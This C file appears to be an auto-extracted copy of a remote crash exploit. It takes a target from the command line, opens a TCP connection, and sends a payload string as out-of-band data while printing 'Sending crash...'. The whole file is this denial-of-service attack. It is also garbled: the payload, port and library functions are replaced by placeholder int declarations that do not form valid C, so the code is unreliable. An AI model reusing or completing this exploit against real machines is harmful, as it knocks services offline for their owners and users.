
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int AF_INET ;
 int IPPROTO_TCP ;
 int MSG_OOB ;
 int SOCK_STREAM ;
 int close (int) ;
 int dport ;
 int exit (int) ;
 int open_sock (int,char*,int ) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int s ;
 int send (int,int ,int ,int ) ;
 int socket (int ,int ,int ) ;
 int str ;
 int strlen (int ) ;
 int usleep (int) ;

void main(int argc, char *argv[]) {

     if (argc != 2) {
       printf("Usage: %s <target>\n",argv[0]);
       exit(0);
     }

     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }

     open_sock(s,argv[1],dport);


     printf("Sending crash... ");
       send(s,str,strlen(str),MSG_OOB);
       usleep(100000);
     printf("Done!\n");
     close(s);
}
